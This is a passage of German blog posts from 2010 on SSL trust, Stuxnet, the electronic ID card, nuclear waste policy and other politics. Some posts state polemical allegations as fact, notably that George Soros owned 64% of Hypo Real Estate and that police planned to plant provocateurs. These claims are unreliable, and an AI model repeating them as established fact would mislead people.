Aus meiner Sicht ist es egal, wie ich es mache. So rein fundamentalistisch betrachtet sind selbst-signierte Zertifikate die ehrlichste Variante. Je nach dem, wie man es betrachtet, gebe ich dann niemandem zusätzlich die Möglichkeit, sich eurem Browser gegenüber als meine Webseite auszugeben. CAcert ist der Kompromiss. Auf der einen Seite kostet das nichts, und ein User muss nur einmal CAcert trauen mit ihrem Browser und kommt dann auf alle https-Seiten mit deren Unterschrift drauf. Auf der anderen Seite prüfen die auch nicht weniger als kommerzielle CAs. Ich habe keine Ahnung, wieso die nicht bei den Browsern drin sind als vertrauenswürdig, ich finde CAcert persönlich vertrauenswürdiger als sagen wie Equifax, die Telekom oder CNNIC. Denn bei CAcert kann man den GPL-Quellcode runterladen. Und die Mailinglistenarchive sind öffentlich einsehbar. Wenn ihr keinen Bock habt, bei meinem Blog jedesmal rote Terrorpanikdialoge wegzuklicken, dann könnt ihr euch hier deren Root-Schlüssel holen und in eure Browser importieren. Wie das genau geht, hängt vom Browser ab. Deren Wiki beschreibt, wie man das macht. Achtung: wenn ihr das tut, kann zusätzlich zu den anderen unvertrauenswürdigen CAs auch CAcert euch gefälschte Webseiten vorspielen.
Aber, was ich an der Stelle nochmal ganz deutlich sagen will: nur weil ihr SSL benutzt, heißt das noch lange nicht, dass die Kommunikation sicher ist und nicht abgehört oder manipuliert werden kann. Im Zweifelsfall sollte man immer zusätzlich zu SSL noch eine Ende-zu-Ende-Verschlüsselung fahren. Bei Email und Jabber kann man z.B. openpgp haben, bei diversen Chatprotokollen gibt es OTR. Wenn ihr eine Wahl habt: immer das zusätzlich einschalten. Und wenn ihr mal jemanden im realen Leben trefft, nutzt die Chance, deren Schlüssel zu vergleichen, damit ihr sicher sein könnt, dass euch da keiner verarscht. Sowas nennt sich dann PGP Keysigning Party.
Update: Vielleicht sollte ich noch klarer sagen: ich habe die CAcert root key in meinen Trusted Root im Browser eingetragen. Fundamentalistisch gesehen müsst man einmal durch seinen Cert Store laufen und alles als unvertrauenswürdig markieren, und dann alle Zertifikate im Web manuell prüfen. Aber in den meisten Fällen geht das ja gar nicht. Wenn ich jetzt hier z.B. hinschreibe, dass der SHA1-Fingerprint für mein aktuelles Zertifikat
```
12:2F:49:D9:86:8D:29:40:38:FF:7D:85:48:FD:0A:89:CA:70:67:E8
```
ist, dann seid ihr auch nicht weiter als vorher. Wenn jemand die SSL-Verbindung zwischen euch und meinem Server manipulieren kann, um euch ein anderes Zertifikat unterzujubeln, dann kann der natürlich auch diese Fingerprintangabe fälschen. Objektiv gesehen müsste man an der Situation mit den SSL-Zertifikaten verzweifeln. Daher plädiere ich dafür, lieber die Leute zu informieren, wie viel Sicherheit ihnen das wirklich bietet, damit sie mit einer angemessenen Erwartungshaltung an SSL herangehen. Oh und: SSL hilft auch nicht gegen Trafficanalyse. Wenn jemand wissen will, welche Seiten ihr hier aufruft, dann kann er das anhand der Größe der Antworten rekonstruieren. Die Daten sind ja immerhin öffentlich. Trotzdem halte ich es für gut und wichtig, Verschlüsselung auch ohne Not einzusetzen, denn je höher der Anteil an verschlüsselten Daten im Netz ist, desto weniger macht man sich verdächtig, wenn man seine Daten verschlüsselt.

Fri Oct 1 2010

[l] McAllister (der Wulff-Nachfolger in Niedersachsen) will jetzt den Indern sachdienliche Hinweise zum Auswählen von Atommüllendlagern geben. Hat mir einer gemailt, steht heute in der Wolfsburger Allgemeinen, aber nicht online. Tja, hätte ich ja gerne drauf gelinkt. Sonst berichten zwar einige Medien über das Treffen, aber nicht von dem Atommüllendlager-Aspekt. Ich zitiere mal ein bisschen:
[…] McAllister (CDU) hat Indien Unterstützung bei dessen Scuhe nach einem Endlager für Atommüll angeboten. „Genau wie bei uns in Deutschland ist das auch hier eine nicht geklärte Frage“
Nun denkt sicher der eine oder andere, dass der da unseren Atommüll nach Indien exportieren will. Will er aber nicht.
Woher ich das weiß? Weil McAllister Gorleben als Geldquelle erkannt hat. Money Quote:
So ist der Bund bei der Sanierung der maroden Schachtanlage Asse II in der Pflicht. Ich poche darauf, dass die Asse saniert wird. Die Kernkraft-Betreiber sind an den Kosten in erheblichem Maße zu beteiligen. Ob die Mittel dafür aus der Brennelementesteuer kommen oder anderswo her, ist nebensachlich. Hauptsache, das Geld fließt.
Denn guckt da mal wie ein skrupelloser CDU-Politiker drauf! Sanierung von Gorleben und der Asse, Ausbau, Gutachten, was das für Arbeitsplätze schafft! Da kann man mindestens zwei neue Behörden mit begründen!!1! Aber natürlich nur, wenn der Müll auch in Niedersachsen bleibt.
Also wenn ihr mich fragt, wäre die beste Lösung, erstmal die CDU in der Asse einzulagern. (Danke, Florian)
[l] Wer sich gerade fragt, wieso die Polizei einen Krimiautoren verkloppen würde, für den habe ich gerade eine überzeugende Erklärung gemailt bekommen:
Durch meine Arbeit als Krimiautor habe ich gute Kontakte zu Polizisten. Aus diesem Umfeld habe ich Hinweise erhalten, dass es im Innenministerium Überlegungen geben soll, Provokateure einzuschleusen, die Gewalttaten begehen, die man den Demonstranten in die Schuhe schieben kann. Möglicherweise eine Gewalttat an Bereitschaftspolizisten.
Eine alter Strategie der Polizei, die sie natürlich jedes einzelne Mal hartnäckig leugnen, bis es nicht mehr geht. (Danke, David)

Thu Sep 30 2010

[l] Stuxnet ist das neue Al Kaida! Jetzt werden schon die ersten Satellitenausfälle auf Stuxnet geschoben und der Schuldige, Siemens, versucht sein Consulting-Business mit Stuxnet zu sanieren. Mir ist jedenfalls von einem Siemenskunden ein Brief gemailt worden, den ich hier mal pasten will:
I IS In Ad- hoc. Aktion zur Beweitigung Malware( Stuxnet) - SIMATIC PCS 7 / WIN CC Security check Up
Sehr geehrter Herr (Geschäftsführer),
derzeit ist eine Malware, ein sogennanter Trojaner im Unlauf, der Microsoft Windows Rechner mit WinCC und PCS 7 betrifft.
Es handelt sich dabei um eine Software, die über einen USB-Stick, oder das Netzwerk verbreitet wird und eine Sicherheitslücke in Microsoft Windows nutzt. Betroffen sind Betriebssysteme von XP an aufwärts.
Systeme, bei denen der Zugang über eine USB-Schnittstelle nicht blockiert ist oder die Schutzvorrichtungen wie Firewall und Virenscanner nicht den aktuellen Anforderungen an die IT Security genügen sind potenzielle Ziele des Trojaners.
Sollten Sie sich über den Stand ihrer Anlage in Bezug auf Microsoft Sicherheitupdates und Virenpattern nicht sicher sein, ist es wichtig auf Grund der aktuellen Bedrohung Maßnahmen zu ergreifen.
Zur Überprüfung der Systemintegrität Ihrer WinCC Installation bieten wir einen Check Up mit den folgenden Leistungsinhalten hat an:
- Überprüfung von Malware (insbesondere "Stuxnet") auf einem WIN CC System
- Installation von SIMATIC Security Update (Beseitigung der Sicherheitslücken durch Anpassung der Registry und SQL-Sicherheitseinstellungen)
- Update der aktuell erforderlichen Virenpattern (bedarf Kundenzustimmung)
- Installation der aktuellen erforderlichen von Siemens freigegeben Windows Patches(bedarf Kundenzustimmung)
- Dokumentation der Ergebnisse
Für bis zu 4 WinCC PCs in einer Anlage bieten wir diesen Service für eine Pauschale von Eur 1.450,- inklusive Reise- und Nebenkosten an. Bei mehr als 4 PC ist der Aufwand entsprechend zu erweitern.
Im Falle eines Virenbefalls kann die Bereinigung von vernetzten WinCC / PCS 7 Systeme sehr variieren, und wird daher nach Zeit und Aufwand erfolgen.
Optional bieten wir folgende Leistungen nach Aufwand zu den publizierten Servicepreisen oder mit einem separaten Angebot an:
- Installation Virenscanner
- IT-Security Check Up aller Anlagenkomponenten
- Implementierung von präventiven und kontinuierlichen Remote Monitoring & Alarm Services
Weiter Informationen erhalten Sie von unserem international Servicecenter (ISI) Tel.: +49 (180) 1-737373
Mit freundlichen Gruß
Meine Quelle versichert, die Grammatikfehler aus dem Original korrekt wiedergegeben zu haben :-)
Ich bin ja immer wieder schockiert, wie Zulieferer die Stirn haben, für das Aufräumen ihrer Fehler auch noch vom Kunden bezahlt werden zu wollen.

Wed Sep 29 2010

[l] Eine Runde Fremdschämen bitte: Die Amis erzählen gerade, sie hätten in Afghanistan Terroranschläge auf Städte in Europa verhindert. Das berichten Sky News und das Wall Street Journal. Die gehören zufällig beide zu News Corp, den Leuten hinter Fox News. Und was für peinliche Wieselformulierungen die da mal wieder verwenden!
Sky News zufolge war die Planung bereits weit fortgeschritten, die Anschläge hätten aber nicht unmittelbar bevorgestanden.
Nee, klar. BRANDGEFÄHRLICH! Aber noch nicht weit genug, dass wir was konkretes vorzuweisen hätten. m(
Oh und wie haben sie die Anschläge verhindert?
Nach Informationen des "Wall Street Journal" hat der US-Geheimdienst die Terrorpläne unter anderem mit Drohnenangriffen auf Ziele in der pakistanischen Unruheregion Waziristan zunichte gemacht.
Aaaaaaha. Die Botschaft ist also nicht nur, dass wir unbedingt weiter im Krieg in Afghanistan bleiben müssen, sondern auch das Drohnenangriffe Leben retten. Kein Wunder, dass sie sich da in Erklärungsnot sehen, denn:
Nach Informationen der Zeitung hat es im vergangenen Monat so viele Drohnenangriffe auf pakistanische Ziele gegeben wie seit sechs Jahren nicht mehr.
Die bomben da alles platt, was ihnen vor die Flinte kommt.
[l] Nochmal zu der Studie zu kommerzieller Kinderpornographie neulich: die Lektüre lohnt sich. Hier hat das mal jemand gemacht. Und tatsächlich haben sie da so wenige kommerzielle Anbieter gefunden, dass sie Usenetprovider gezählt haben. Nicht nur das, sie haben auch Reseller gezählt. Die Ausbeute ist geradezu lächerlich. Sie haben sich mal die Datenbank mit den 14579 Kinderpornosites genommen und geguckt, und es blieben 46 übrig, die tatsächlich erreichbar waren und irgendwelche Bilder hatten, die unter deren Definition fallen. Von diesen 46 waren 10 aus der Kategorie A, d.h. tatsächlich mit nackten Minderjährigen. Von diesen 10 konnte man bei sechs gar nichts bezahlen; zwei waren irgendwelche Einzelbilder bei Bildhostern, zwei sahen suspekt aus aber verwiesen doch nur auf eine Site mit legalen Teen-Bildern, einer war eine Nudistensite (kein sexueller Kontext) und eine war eine 3d-Cartoon-Site.
Von den Sites mit Zahlfunktion waren zwei 3d-Cartoon-Sites, von denen sie aber glauben, dass da nur Kreditkartendaten gesammelt werden sollten, und zwei waren Nudistensites ohne sexuellen Kontext. DAS, meine Damen und Herren, ist ihre Ausbeute. Kein einziger Fall von tatsächlichem Missbrauch. Nada.
Der Rest der Sites ist Kategorie A1:
The site shows young children in suggestive, but clothed, positions.
Unter diesen Umständen ist "Kinderpornographie im Netz kein großes Geschäft" ja wohl eine eher untertreibende Beschreibung der Situation.

Mon Sep 27 2010

[l] Change we can believe in: Obama benutzt die "State Secret" Ausrede in einem Gerichtsverfahren wegen Erschießung eines US-Bürgers.
in other words, not only does the President have the right to sentence Americans to death with no due process or charges of any kind, but his decisions as to who will be killed and why he wants them dead are "state secrets," and thus no court may adjudicate their legality.
Kommt das noch jemandem bekannt vor? Ich erinnere mich vage an einen anderen Präsidenten, der das auch so gemacht hat.
[l] Fürs Archiv ein bisschen Alternativlos-Manöverkritik. Die Hardware war besser, die Audioqualität ist ausgezeichnet, aber unsere Prozesse sind noch ausbaufähig. So sind mir beim Pasten des Vorspanns beim ersten Upload am Ende ein-zwei Minuten verloren gegangen und das brach mitten im Satz ab. Vor dem Vorpasten des Vorspanns hatte ich nochmal QA gemacht, aber nicht danach. Anfängerfehler. Sehr ärgerlich, weil ich die Quelldateien schon gelöscht hatte. An der Stelle kann ich übrigens dieses ext4-Undelete-Tool wärmstens empfehlen, der guckt in das Journal im Filesystem und restaurierte mir die Dateien perfekt.
Noch eine Sache, die wir heute gelernt haben: unser Setup ist zwei Kopfhörer mit Mikrofonen, ein Aufnahmegerät, und ein Verstärker. So hören wir über die Kopfhörer unser eigenes Signal. Das ist wichtig, damit man mitkriegt, wenn die Aufnahme Störgeräusche hat oder abbricht. Bei uns war heute der Verstärker lauter als die Realität, und daher haben wir instinktiv leise geredet, fast geflüstert an einigen Stellen. Dann mußten wir den Gain hochdrehen und am Ende nochmal mit dem Kompressor rüber. Nächstes Mal machen wir den Gain kleiner und den Verstärker leiser und reden dann hoffentlich instinktiv lauter.
Aber so generell finde ich, dass die Audioqualität schon sehr erfreulich ist. Wie im Radio :-)
Übrigens, noch einer für die Audionerds: das mp3 könnte man bei fast gleicher Qualität nochmal um 30% kleiner machen, allerdings resampled lame dann auf 32 khz statt wie bisher 44,1. Ich hätte das gemacht, aber habe mich überstimmen lassen, wegen Bedenken, dass irgendwelche Ranz-Player das dann nicht spielen können. Gibt es wirklich MP3-Player, die keine 32 khz mp3s abspielen können? Wenn jemand einen hat, bei dem das so ist (bitte kein "ein Freund eines Freundes kennt jemanden, der gehört hat"): sachdienliche Hinweise erbeten.
Eine Sache noch: richtig gut funktioniert hat der Versuch, die beiden Mono-Tonspuren separat aufzunehmen in ein 2-Kanal-File. So kann man prima Nebengeräusche wie ein Räuspern oder so rausnehmen. Die Mikrofone in den Headsets haben eine Niere-Charakteristik (wir haben uns übrigens zwei Beyerdynamic DT 297 PV gekauft und können die weiterempfehlen) und reagieren erstaunlich unempfindlich auf Geräusche von anderen Seiten. Leider reagieren sie auch erstaunlich empfindlich auf Geräusche vor ihnen; selbst "geräuschloses" Matetrinken oder mit der Hand übers Kinn streichen hört man prima auf der Aufnahme.

Sun Sep 26 2010

[l] Was tut Blackwater eigentlich mit der ganzen Kohle, die sie aus der US-Regierung rausgetragen haben? Parties feiern! Und offenbar keine schlechten.
And what goes better with guns and steroids than nudity and drugs? In a sworn deposition for a lawsuit brought by two ex-Blackwater employees, Lowry maintains that he hung out at Blackwater parties in Baghdad where “company personnel had large amounts of cocaine and blocks of hashish and would run around naked.” Addled guards would step onto the balconies of the their rooms at the Hamra Hotel, point their automatic rifles at Iraqi housing complexes and open fire.
Und das sollen die wohl jede Woche gemacht haben. Wem da jetzt noch die Stripper fehlen:
Ex-employees Brad and Melan Davis have accused Blackwater of defrauding the government by, among other interesting bookkeeping techniques, billing the government for money spent on strippers.
Das sah Blackwater ähnlich :-)

Sat Sep 25 2010

[l] Wer sich fragt, was die eigentlich alle immer mit unseren Fingerabdrücken wollen, dem empfehle ich als Lektüre diesen Bericht über die US Army in Afghanistan. Money Quote:
It’s a high-tech upgrade to a classic counterinsurgency move — simultaneously taking a census of the population, culling security forces of double agents and cutting off guerrilla routes. (Plus, bombs and weapons can be swabbed for fingerprints to build files on insurgent suspects.) Gen. David Petraeus, now commander of the Afghan war effort, relied heavily on biometrics during his time in command of U.S. forces in Iraq.
Das ist Stand der Technik, wenn man seiner Bevölkerung nicht traut. So machen Besatzungsmächte das heutzutage. Und unsere Regierung verhält sich ja auch mehr und mehr wie ein Besatzungsregime. Ich kann mich gar nicht erinnern, wann die zuletzt mal ein Gesetz zu unserem Vorteil gemacht haben.

Fri Sep 24 2010

[l] Andere Leute raubkopieren Musik oder Filme, die NPD klaut gleich mal die Kandidaten der Piratenpartei in Baden-Württemberg :-)
Fürs Archiv habe ich mal Screenshots gemacht: NPD, Piraten (Zur Größenreduktion brutal runterquantisiert).
Update: Der NPD-Server ist unter der Last geplatzt, die Piraten stehen noch. Klarer Fall von technischem KO im Wahlkampf würde ich sagen :-)

Thu Sep 23 2010

[l] Ich hatte neulich gebloggt, dass Diaspora unsicher ist. Hier sind die Details. Für jeden, der mal Ruby on Rails gemacht hat, und vermutlich auch viele andere, ist das eine hochspannende Lektüre.
[l] Das BSI hat sich zum CCC geäußert, und das will ich mal partiell zitieren:
[…]
Am Rande bleibt noch zu erwähnen, dass in Gebäuden der Bundesverwaltung - und somit auch im BSI - Rauchverbot besteht, so dass wir dem veröffentlichen Wunsch des Chaos Computer Clubs (vgl. http://www.ccc.de, Veröffentlichung vom 21.09.2010 um 22:00:00 Uhr; Zitat: "Was die da rauchen …") nicht entsprechen können.
Mit freundlichen Grüßen,
Matthias Gärtner
--------------------------------------------
Bundesamt für Sicherheit in der Informationstechnik (BSI)
Pressesprecher
Also Humor haben sie ja :-)
Das ging leider per Mail rum, jedenfalls habe ich keine URL dazu. Vielleicht veröffentlicht das ja nochmal jemand in Gänze.
Übrigens, bei aller Häme über de Maizieres Äußerungen gestern: eigentlich hat der Mann unser Mitleid verdient. Der muss sich da ins Fernsehen stellen und ein Rohrkrepierer-Projekt verteidigen, an dem sich ausgerechnet der Mensch, den er (deswegen?) rausgeschmissen hat, August Hanning, eine goldene Nase verdient.
Update: Hahaha, sie haben da echt ne DPA-Meldung draus gemacht! Liebes BSI, wenn ihr zum 27C3 kommt, trinken wir gerne ein Gläschen Rotwein mit euch und tauschen Gerüchte über Stuxnet aus :-)

Wed Sep 22 2010

[l] Ich wollte mich ja aus dieser ePA-Sache raushalten, weil ich genug Baustellen habe, aber an den Schadensbegrenzungsaussagen des BSI in diesem Artikel komme ich nicht vorbei.
BSI-Experte Jens Bender nahm Stellung zur Kritik des CCC. Er räumte ein, wenn ein Benutzer "den großen Fehler" mache, den elektronischen Personalausweis länger als nötig in einem Lesegerät zu lassen, könne sich ein Angreifer im Besitz der PIN tatsächlich für ihn ausgeben, zum Beispiel bei Altersverifizierungsdiensten.
DAS ist ihre Strategie jetzt? "Das ist alles sicher, aber tut die Karte nur in den Leser, wenn ihr wirklich müsst"? Bwahahahaha, was für eine Lachnummer!
Und ihre Verteidigung zu den Geschäften im Internet ist, dass man dafür eine digitale Signatur braucht und sich nicht nur ausweist. Aha. Soso. Hat das mal jemand dem Herrn de Maiziere erklärt? Der hat die Identifikationsfunktion nämlich schon als Funktion fürs sichere Einkaufen im Internet beworben.
So ein Personalausweis hat drei logisch getrennte Bereiche, den hoheitlichen Teil mit den Biometriedaten, den eID-Teil fürs Ausweisen, und als drittes die Signatur. Damit die aber rechtswirksam ist, muss laut Signaturgesetz die PIN am Smartcardreader eingegeben werden, man braucht also einen Reader mit PIN-Eingabefeld, der braucht dann auch eine richtige Stromversorgung und kostet richtig Geld, weil das a) RFID statt Kontakten ist wie bei den verbreiteten Readern mit Pinpad im Moment und b) gibt es solche Reader für den "nPA" (ePA ist nämlich verbrannt, müsst ihr wissen, deshalb nennen die das jetzt "nPA") noch nicht.
Kurz gesagt: ihre Verteidigung ist, dass der eID-Teil eh für den Fuß ist, und man halt den Signaturteil benutzen soll, den es noch nicht gibt (die beiden zertifizierten Leser sind in der Klasse "Basis", d.h. ohne Pinpad und ohne Display, der Rest sind nur Labormuster ohne BSI-Zertifizierung).
Und, um das nochmal ganz deutlich zu sagen: "dann lässt man die Karte halt nicht im Leser" ist unter dem Gesichtspunkt "das sind kontaktlose RFID-Karten" auch noch mal eine besonders … spaßige Aussage.
Angeblich haben sie schon ne Million Reader ohne Pinpad geordert, damit sie überhaupt was zum zeigen haben. Ohne Pinpad heißt natürlich unsicher, und weil wir, um das nicht zu kompliziert zu machen, als Gefahr "Keylogger" benannt haben, haben sie sich als Feigenblatt ein Software-Pinpad auf dem PC gemacht, wo man dann die Tasten mit der Maus klickt und nicht auf der Tastatur eingibt. Weil das natürlich was GANZ ANDERES ist und VÖLLIG UNABGREIFBAR durch Trojaner!1!! Da kriegt man echt abgenutzte Handflächen vom Fazialpalmieren.
An der Stelle sei auch auf die CCC-Presseerklärung zum Thema hingewiesen. Mein Lieblingssatz daraus:
"Was die da rauchen, hätten wir auch gern mal", kommentierte CCC-Sprecher Engling.
Update: Noch ein Detail: mit der eID-PIN kann man die Signatur-PIN setzen, wenn die noch nicht gesetzt wurde, was ja bei praktisch allen Anwendern zumindest initial der Fall sein wird.

Tue Sep 21 2010

[l] Ich bringe hier ja häufiger Mal furchtbare Meldungen. Je übler, desto lieber bringe ich sie. Am besten sind Artikel, bei denen man das Ende der Welt förmlich an die Tür klopfen hört. Aber keiner war jemals so furchtbar wie dieser hier:
Die Bundesregierung trifft nach SZ-Informationen Vorbereitungen für die Privatisierung der Atommüll-Endlager.
OH NEEEEEEEEIIIIIIIIIIIIIIIIIIN!!!!!!!!!!!!!!
Auf der anderen Seite muss ich an das Plakat denken, mit dem Constanze neulich auf der Anti-Atom-Demo rumlief. Sie schlug darauf das Kanzleramt als Atommüllendlager vor. Das ist zwar mitten in Berlin, aber wahrscheinlich ungefährlicher als wenn man das privatisiert.
Sollte der Staat ein Unternehmen beleihen, das in alleinigem Besitz des Bundes ist, könnte er dem Entwurf zufolge weitgehend autonom wirtschaften, der Bund würde dann nur noch die Einhaltung der Gesetze kontrollieren. Eine fachliche Aufsicht sei in diesem Fall "nicht erforderlich", heißt es zur Begründung. "Die Interessen des Bundes können effektiver über seine Unternehmensbeteiligung durchgesetzt werden."
Kann man sich gar nicht ausdenken, sowas. Nee, klar, das klingt voll seriös! Man malt neue Klingelschilder dran und schon ist man die Haftung los!1!! In Frage kommt laut SZ nur ein Unternehmen in Frage, die "Energiewerke Nord". Was haben die vorher gemacht?
Die Energiewerke Nord (EWN) gingen nach der Wende aus der Abwicklung der DDR-Kernkraftwerke hervor, ihr einziger Gesellschafter ist das Bundesfinanzministerium.
Öh, das Finanzministerium! Na wenn DIE nicht wissen, wie man mit radioaktiven Sachen umgeht, dann weiß ich auch nicht. Guckt euch nur an, wie souverän die die radioaktiven Wertpapiere bei der HRE gemanaged haben!
Die Details über diese Nordwerke sind auch sehr beruhigend:
Das Unternehmen mit Sitz nahe dem ehemaligen DDR-Atomkomplex "Bruno Leuschner" bei Greifswald baut seit den neunziger Jahren die ostdeutschen AKWs zurück, es verantwortet auch den Rückbau von Atom-Forschungsanlagen in Karlsruhe und Jülich. Damit ist es der derzeit größte Eigentümer von Atommüll in Deutschland.
Seht ihr, die wissen bisher schon nicht, wohin mit ihrem Atommüll! Das qualifiziert sie doch eindeutig, das auch in Zukunft zu beherrschen! (Danke, Mark)

Sun Sep 19 2010

[l] Ich habe mir heute mal den Spaß gemacht, bei der Jerusalem Post nach Iran und Nuclear zu suchen, und nach Datum zu sortieren. Das Archiv geht bis 1989 zurück. Hier ist z.B. ein Artikel von 1993. Und Shimon Peres sagt 1995:
THE greatest threat to Israel comes from Iran's nuclear program
Nur so als Einordnung der aktuellen Atompanik. Die selbe Atomterrorpanik schieben die da seit 20 Jahren.
Oh und als Lacher am Rande: "Netanyahu meets Kohl in Bonn". 1995. Lest euch das mal durch, das ist ein epischer Schenkelklopfer. Kohl fragt Netanyahu, ob sie ihre Versprechen einhalten werden. Netanyaho antwortet mit einem wunderbaren Fuck You.
[l] Eine gute, eine schlechte, und noch eine gute Nachricht.
Die 1. gute: Wir haben die Kohle für ordentliches Audioequipment zusammen.
Die 1. schlechte: das Shipping zog sich ewig lang hin, wir haben bestellt und bezahlt aber haben es noch nicht.
Die 2. gute: wir haben nicht länger warten wollen und haben dann halt nochmal mit dem alten Equipment eine Aufnahme gemacht, die ich gerade hochgeladen habe.
Viel Spaß also mit Alternativlos, Folge 4. Themen sind: die neuen Rechten, Einwanderungspolitik, Peak Oil, Containerschifffahrt, kolumbianische Drogendrohnen, Rohstoffspekulanten und der Afghanistanausstieg.

Fri Sep 17 2010

[l] Jemand hat dem Interpol-Chef seinen Facebook-Account aufgemacht und sich damit Informationen über eine laufende Operation abgeschnorchelt. Die BESTEN der BESTEN der BESTEN, SIR!
"This is why we constantly need to share our experience," he added at Wednesday's opening ceremony of the conference.
*augenroll*

Wed Sep 15 2010

[l] Wollt ihr mal gucken, was Spiegel TV aus der Szene vor der Moschee gemacht hat: auf dieser Seite, das 3. Video von oben, "Mönchengladbach und der Muezzin", ab 7:24. Der bibelfeste Sonnenbrillenträger ist bei 8:40 :-)
Die anderen Teile sind auch sehenswert. In Teil 1 z.B. fragen sie angesichts linker Anti-Sarrazin und Anti-Rassismus-Demonstranten, wo die Demonstranten eigentlich bei dem letzten Ehrenmord gewesen seien.

Tue Sep 14 2010

[l] Die ersten Work-CSS-Vorschläge kommen rein:
1. Man Page
2. Google 1
3. Google 2
4. work.css
5. pythondoc
6. bluescreen (der Einsender meint, das sei für Fullscreen-Modus)
7. Hier ist einer für Mac-User
Anleiten fürs Loswerden gibt es in der FAQ.
Jetzt ist glaube ich auch eine gute Gelegenheit, auf das vt220-Stylesheet hinzuweisen, das hier seit einer Weile rumfliegt. Ich hatte das mal gemacht, weil ich die Font im Internet gefunden hatte. Die ist wohl aus den ROMs extrahiert. Ich hatte den Typen angemailt, wie denn der Lizenzstatus ist und nie eine Antwort gekriegt. Wahrscheinlich weiß er es selber nicht, wenn das wirklich aus den DEC ROMs kommt. Ich glaube das kam von hier.
Nicht besonders nach Arbeit, eher nach Wordpress sieht diese Einsendung aus. Ansonsten gibt es für Arbeitssimulation natürlich auch noch das gute alte Wikipedia-Stylesheet.
Update: Noch mehr:
1. blaugrauweiss
2. HTML "view source"
3. MSDN
4. SPON (da müsste man noch ein paar metrische Tonnen Navigations-Müll und Flash-Werbung draufpacken, damit das glaubwürdig wird)
5. gugl3
6. feeefe-blog-suche.css
7. lightblue.css (kein Verstecken-Theme)

Mon Sep 13 2010

[l] Die neue Kampagne der viktorianisch-konservativen "ihr sollt euch nach unseren Moralvorstellungen benehmen" Fraktion um Frau zu Guttenberg rollte heute in Form der "Bild" an einer Tanke auf das Volk zu. Ich linke ja nur sehr ungerne auf die, aber besser angeekelt und vorgewarnt als überrascht und in der Fußgängerzone wegen zu aufreizender Kleidung verhaftet. Diesen Leuten traue ich persönlich ja alles zu. Und da sieht man auch mal, was für eine groteske Farce diese ganze Kinderpornographie-Scheiße war, die die Guttenberg da losgetreten hat. Offensichtlich diente das ja nur dazu, ihren Namen ins Gespräch zu bringen, damit sie jetzt gegen Pornographie insgesamt vorgehen kann. Sittenwächterin der Nation, genau was wir jetzt brauchen.
Ich verstehe bei sowas ja nicht, wieso die nicht in ihrer Fraktion mal anfangen. Da hätte doch niemand ein Problem damit, wenn Frau zu Guttenberg es sich zur persönlichen Aufgabe gemacht hätte, den Sachsensumpf auszuheben und den obszönen Sittenverfall im Bundestag in Form der gesammelten Schwarz-Geld-Gesetzentwürfe zu bekämpfen. Aber nein, unsere Kinder wollen sie für uns erziehen. In der Hoffnung, dass die noch nicht kritikfähig genug sind, um durch ihre Bullshitwerfmaschinerie durchzublicken. Aus dem Blickwinkel erscheint auch die Internetsperren-Jugendschutzgeschichte plötzlich sinnvoll. Man muss die Kinder natürlich vom Internet fernhalten, damit sie sich nicht von alleine informieren.
Update: Hier kommt eine Mail rein, von jemandem, der das Buch von der Guttenberg im Gegensatz zu mir gelesen hat, und der meint, das sei gar nicht so schlimm, sie mache sich bloß Sorgen, dass die Kinder von zu viel Pornographieeinfluss in der Entwicklung gestört werden könnten. Dinge wie Internetzensur fordere sie gar nicht. Insofern: selber Meinung bilden, nicht der "Bild" glauben.
[l] OK, Freunde, ich habe ein Leckerli für euch. Ihr habt hoffentlich alle den Link von vorhin gelesen mit den HRE-Großaktionären.
Mir ist erstmal eine Sache aufgefallen, und zwar in diesem Report auf Seite 11. Da geht es um die Bürgschaften. Die laufen unter dem Posten "Issue of SoFFin-guaranteed bearer bonds".
Bearer Bonds kenne ich nur aus Kriminalfilmen, weil es keinen Papierkram gibt, der den Besitz festhält, das ist wie Bargeld. Wenn ich mal Wikipedia zitieren darf an der Stelle:
Bearer bonds have historically been the financial instrument of choice for money launderers, tax evaders, and those just generally trying to conceal business transactions. In response, new issuances of bearer bonds were banned in the United States in 1982.
Na das passt ja mal wieder wie Arsch auf Eimer.
Aber gucken wir mal weiter. Die Jahnke-Tabelle weist eine ungewöhnliche Häufung von Redwood Grove International $foo und RGI $bar auf, wenn man die Co-Invest-Associates unter der selben Anschrift auf Grand Cayman dazurechnet, haben die 49% der Stimmen. Da stellt sich ja schon die Frage, wer das eigentlich ist. Wenn man denen hinterhergoogelt, findet man heraus, dass das ein Immobilienfonds ist. Gucken wir doch mal weiter. Das ist nur einer der Namen, unter denen Grove International Partners in HRE investiert hat, da kommt auch noch Learmonth aus Luxemburg mit einem 7% Anteil dazu. Insgesamt kommt man da auf 9 Anteile zu 7%. Das sind 64%, die Mehrheit der HRE! OK, das wird ja immer spannender. Wer ist das also?
Achtung, hinsetzen:
The firm was formerly known as Soros Real Estate Partners. Mr. George Soros founded Grove Capital in 1999.
George Soros besaß 2008 64% der Anteile von der HRE. Das ist jetzt leider nicht ganz so eine großartige Verschwörungsgeschichte, wie ich gehofft hatte, weil sie das alles im Mai 2009 verkauft haben. Im April gab es nämlich die Verstaatlichung. Kurz gesagt: wir haben den Hartz IV Opfern das Geld gekürzt, damit sich George Soros an seinen Spekulationen eine goldene Nase verdienen konnte.
Falls es jemand vergessen hat, hier nochmal fürs Archiv: George Soros hat 1992 gegen das britische Pfund spekuliert und gewonnen. George Soros hat dabei 1,1 Milliarden Dollar Gewinn gemacht, und die Briten 3,4 Milliarden Pfund Verlust. Money Quote über Soros:
The Times of Monday, October 26, 1992, quoted Soros as saying: "Our total position by Black Wednesday had to be worth almost $10 billion. We planned to sell more than that. In fact, when Norman Lamont said just before the devaluation that he would borrow nearly $15 billion to defend sterling, we were amused because that was about how much we wanted to sell."
Vielen Dank an Patrick für den Hinweis mit der Soros-Connection.

Wed Sep 8 2010

[l] Nicht nur wir haben ein Problem mit Prügelcops, auch die Amerikaner. Und die haben mal eine spannende Studie gemacht, welche Art von Cop gerne prügelt, ob es da eine Korrelation gibt. Das Ergebnis wird euch wahrscheinlich genau so schockieren wie mich:
The study found no difference with respect to officer education when it came to arrests or searches of suspects. But it found that in encounters with crime suspects, officers with some college education or a four-year degree resorted to using force 56 percent of the time, while officers with no college education used force 68 percent of the time.
Anders ausgedrückt: je ungebildeter, desto Prügelcop.
[l] Die Eichmann-Akten-Farce hat sogar schon den San Francisco Chronicle erreicht. Ansonsten findet man auch Berichterstattung bei Neues Deutschland und im NPD-Blog (das ist ein Blog über die NPD, nicht von ihr).
